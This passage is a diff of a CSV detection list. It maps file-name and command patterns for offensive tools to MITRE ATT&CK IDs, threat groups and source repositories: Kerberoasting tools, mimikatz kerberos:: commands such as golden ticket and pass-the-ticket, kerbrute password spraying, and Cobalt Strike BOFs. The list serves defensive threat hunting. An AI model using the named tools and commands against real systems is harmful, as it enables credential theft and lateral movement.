+"*kerberoast.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z"
+"*Kerberoast.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*kerberoastables.txt*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
+"*kerberoasting*","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","81","33","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z"
+"*kerberoasting.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*kerberos*.kirbi*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*kerberos/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::ptt *.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z"
+"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - 
T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::ptt*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute bruteuser *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute passwordspray *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds 
of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute userenum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
